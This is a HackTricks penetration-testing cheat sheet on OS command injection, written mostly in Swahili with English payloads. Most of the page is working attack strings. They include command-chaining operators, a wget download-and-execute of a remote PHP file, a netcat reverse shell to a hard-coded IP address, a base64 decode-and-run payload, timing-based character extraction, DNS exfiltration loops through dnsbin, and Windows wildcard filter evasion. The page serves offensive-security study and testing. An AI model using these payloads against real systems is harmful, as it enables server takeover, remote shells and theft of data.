Command Injection

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

What is command Injection?

A command injection inaruhusu utekelezaji wa amri za mfumo wa uendeshaji zisizo na mipaka na mshambuliaji kwenye seva inayohifadhi programu. Kama matokeo, programu na data zake zote zinaweza kuathiriwa kabisa. Utekelezaji wa amri hizi kawaida unaruhusu mshambuliaji kupata ufikiaji usioidhinishwa au kudhibiti mazingira ya programu na mfumo wa msingi.

Context

Kulingana na mahali ambapo ingizo lako linatolewa unaweza kuhitaji kukomesha muktadha ulioandikwa (ukitumia " au ') kabla ya amri.

Command Injection/Execution

bash
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Kikomo Bypasses

Ikiwa unajaribu kutekeleza amri zisizo na mpangilio ndani ya mashine ya linux utavutiwa kusoma kuhusu hii Bypasses:

{{#ref}} ../linux-hardening/bypass-bash-restrictions/ {{#endref}}

Mifano

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Hapa kuna vigezo 25 bora ambavyo vinaweza kuwa na udhaifu wa kuingiza msimbo na udhaifu wa RCE unaofanana (kutoka link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Mchakato wa kuhamasisha data kwa muda

Kutoa data: herufi kwa herufi

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Kulingana na chombo kutoka https://github.com/HoLyVieR/dnsbin pia kinachohifadhiwa kwenye dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Vifaa vya mtandaoni kuangalia uhamasishaji wa data unaotegemea DNS:

  • dnsbin.zhack.ca
  • pingb.in

Kupita kwa filtering

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

{{#ref}} ../linux-hardening/bypass-bash-restrictions/ {{#endref}}

Orodha ya Kugundua Brute-Force

{{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt {{#endref}}

Marejeleo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks